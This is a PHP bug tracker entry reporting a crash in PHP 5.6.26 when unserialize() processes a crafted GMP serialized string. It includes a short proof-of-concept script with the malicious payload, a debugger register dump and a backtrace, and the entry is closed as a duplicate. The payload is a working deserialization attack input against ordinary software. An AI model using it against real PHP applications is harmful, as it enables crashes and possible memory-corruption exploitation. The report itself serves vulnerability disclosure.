php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #73153 Crash with an Unexpected Object when Deserialize GMP object
Submitted: 2016-09-23 16:56 UTC Modified: 2017-01-16 13:32 UTC
From: ahihibughunter at gmail dot com Assigned:
Status: Duplicate Package: GNU MP related
PHP Version: 5.6.26 OS: Ubuntu
Private report: No CVE-ID: None
 [2016-09-23 16:56 UTC] ahihibughunter at gmail dot com
Description:
------------
#Similar with 72663
When php trying to deserialize an unexpected object via GMP, it will lead to crash.

Test script:
---------------
<?php
class bug{
    public function __wakeup(){
       $this->bug=str_repeat('A', 0xff);
    }
}
$r='s:1:"0";a:1:{i:0;O:3:"bug":1:{s:3:"bug";R:2;}}';
$s='a:1:{i:0;C:3:"GMP":'.strlen($r).':{'.$r.'}}';
$x=unserialize($s);

Expected result:
----------------
No crash

Actual result:
--------------
Program received signal SIGSEGV, Segmentation fault.
 [----------------------------------registers-----------------------------------]
RAX: 0x803df5e8aa20
RBX: 0x10007fff730e --> 0xf4f4f400f1f1f1f1
RCX: 0x7ffff7f67820 --> 0x0
RDX: 0x1007bebd1545
RSI: 0xffffeff006b --> 0x0
RDI: 0x803df5e8aa28
RBP: 0x7fffffff9830 --> 0x7fffffff9980 --> 0x7fffffff9bc0 --> 0x7fffffff9d10 --> 0x7fffffff9f50 --> 0x7fffffffa0e0 (--> ...)
RSP: 0x7fffffff9810 --> 0x7ffff7f7dd75 --> 0x29007d7d ('}}')
RIP: 0xbd6bea (<zend_std_get_properties+121>:   cmp    BYTE PTR [rdx+0x7fff8000],0x0)
R8 : 0x1
R9 : 0xa ('\n')
R10: 0x778
R11: 0x1e
R12: 0x7ffff7f7b2f0 --> 0x700000008 --> 0x0
R13: 0x7ffff7f7d890 --> 0x7ffff7f7c378 --> 0x41 ('A')
R14: 0xffffffff30e --> 0x0
R15: 0x7ffff7f7d8b0 --> 0x1
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xbd6bdf <zend_std_get_properties+110>:      lea    rdi,[rax+0x8]
   0xbd6be3 <zend_std_get_properties+114>:      mov    rdx,rdi
   0xbd6be6 <zend_std_get_properties+117>:      shr    rdx,0x3
=> 0xbd6bea <zend_std_get_properties+121>:      cmp    BYTE PTR [rdx+0x7fff8000],0x0
   0xbd6bf1 <zend_std_get_properties+128>:      je     0xbd6bf8 <zend_std_get_properties+135>
   0xbd6bf3 <zend_std_get_properties+130>:      call   0x4205e0 <__asan_report_load8@plt>
   0xbd6bf8 <zend_std_get_properties+135>:      mov    rbx,QWORD PTR [rax+0x8]
   0xbd6bfc <zend_std_get_properties+139>:      lea    r13,[rbx+0x8]
[------------------------------------stack-------------------------------------]
0000| 0x7fffffff9810 --> 0x7ffff7f7dd75 --> 0x29007d7d ('}}')
0008| 0x7fffffff9818 --> 0x10007fff730e --> 0xf4f4f400f1f1f1f1
0016| 0x7fffffff9820 --> 0x7ffff7f7b2f0 --> 0x700000008 --> 0x0
0024| 0x7fffffff9828 --> 0x7ffff7f7d890 --> 0x7ffff7f7c378 --> 0x41 ('A')
0032| 0x7fffffff9830 --> 0x7fffffff9980 --> 0x7fffffff9bc0 --> 0x7fffffff9d10 --> 0x7fffffff9f50 --> 0x7fffffffa0e0 (--> ...)
0040| 0x7fffffff9838 --> 0x74e4b7 (<gmp_unserialize+1387>:      mov    r8d,0x8)
0048| 0x7fffffff9840 --> 0x178d330 --> 0x0
0056| 0x7fffffff9848 --> 0xffffffff38c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000bd6bea in zend_std_get_properties (object=<optimized out>) at /home/z/php5/Zend/zend_object_handlers.c:108
108             zobj = Z_OBJ_P(object);
gdb-peda$ bt
#0  0x0000000000bd6bea in zend_std_get_properties (object=<optimized out>) at /home/z/php5/Zend/zend_object_handlers.c:108
#1  0x000000000074e4b7 in gmp_unserialize (object=<optimized out>, ce=<optimized out>, buf=<optimized out>, buf_len=<optimized out>, data=<optimized out>) at /home/z/php5/ext/gmp/gmp.c:662
#2  0x0000000000a01e9f in object_custom (ce=0x603600005e00, var_hash=0x2e, max=0x2e <error: Cannot access memory at address 0x2e>, p=0x7fffffffa030, rval=0x2e) at /home/z/php5/ext/standard/var_unserializer.c:393
#3  php_var_unserialize (rval=rval@entry=0x7fffffff9c60, p=p@entry=0x7fffffffa030, max=max@entry=0x7ffff7f7dd77 "", var_hash=var_hash@entry=0x7fffffffa070) at /home/z/php5/ext/standard/var_unserializer.c:758
#4  0x0000000000a045d2 in process_nested_data (rval=rval@entry=0x7fffffff9f88, p=p@entry=0x7fffffffa030, max=max@entry=0x7ffff7f7dd77 "", var_hash=var_hash@entry=0x7fffffffa070, ht=<optimized out>, elements=0x0,
    elements@entry=0x1, objprops=<optimized out>, objprops@entry=0x0) at /home/z/php5/ext/standard/var_unserializer.c:324
#5  0x0000000000a02589 in php_var_unserialize (rval=rval@entry=0x7fffffff9f88, p=p@entry=0x7fffffffa030, max=<optimized out>, var_hash=var_hash@entry=0x7fffffffa070) at /home/z/php5/ext/standard/var_unserializer.c:842
#6  0x00000000009da822 in zif_unserialize (ht=<optimized out>, return_value=<optimized out>, return_value_ptr=<optimized out>, this_ptr=<optimized out>, return_value_used=<optimized out>) at /home/z/php5/ext/standard/var.c:964
#7  0x0000000000d616fc in zend_do_fcall_common_helper_SPEC (execute_data=execute_data@entry=0x7ffff7f479d8) at /home/z/php5/Zend/zend_vm_execute.h:558
#8  0x0000000000d630be in ZEND_DO_FCALL_SPEC_CONST_HANDLER (execute_data=0x7ffff7f479d8) at /home/z/php5/Zend/zend_vm_execute.h:2602
#9  0x0000000000c148ad in execute_ex (execute_data=execute_data@entry=0x7ffff7f479d8) at /home/z/php5/Zend/zend_vm_execute.h:363
#10 0x0000000000d5caaf in zend_execute (op_array=0x7ffff7f7adc0) at /home/z/php5/Zend/zend_vm_execute.h:388
#11 0x0000000000b67b3e in zend_execute_scripts (type=type@entry=0x8, retval=retval@entry=0x0, file_count=file_count@entry=0x3) at /home/z/php5/Zend/zend.c:1341
#12 0x0000000000a48876 in php_execute_script (primary_file=primary_file@entry=0x7fffffffcf20) at /home/z/php5/main/main.c:2613
#13 0x0000000000d6604e in do_cli (argc=argc@entry=0x2, argv=argv@entry=0x60060000ee90) at /home/z/php5/sapi/cli/php_cli.c:994
#14 0x0000000000d680d6 in main (argc=argc@entry=0x2, argv=0x60060000ee90, argv@entry=0x7fffffffe668) at /home/z/php5/sapi/cli/php_cli.c:1378
#15 0x00007ffff3da7f45 in __libc_start_main (main=0xd670a2 <main>, argc=0x2, argv=0x7fffffffe668, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe658) at libc-start.c:287
#16 0x00000000004226e9 in _start ()

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-09-23 16:59 UTC] ahihibughunter at gmail dot com
-Summary: Create an Unexpected Object when Deserialize GMP object +Summary: Crash with an Unexpected Object when Deserialize GMP object
 [2016-09-23 16:59 UTC] ahihibughunter at gmail dot com
change name
 [2017-01-16 13:32 UTC] nikic@php.net
-Status: Open +Status: Duplicate
 [2017-01-16 13:32 UTC] nikic@php.net
This is a duplicate of sec bug #70513.
 
PHP Copyright © 2001-2020 The PHP Group
All rights reserved.
Last updated: Thu Feb 27 16:01:29 2020 UTC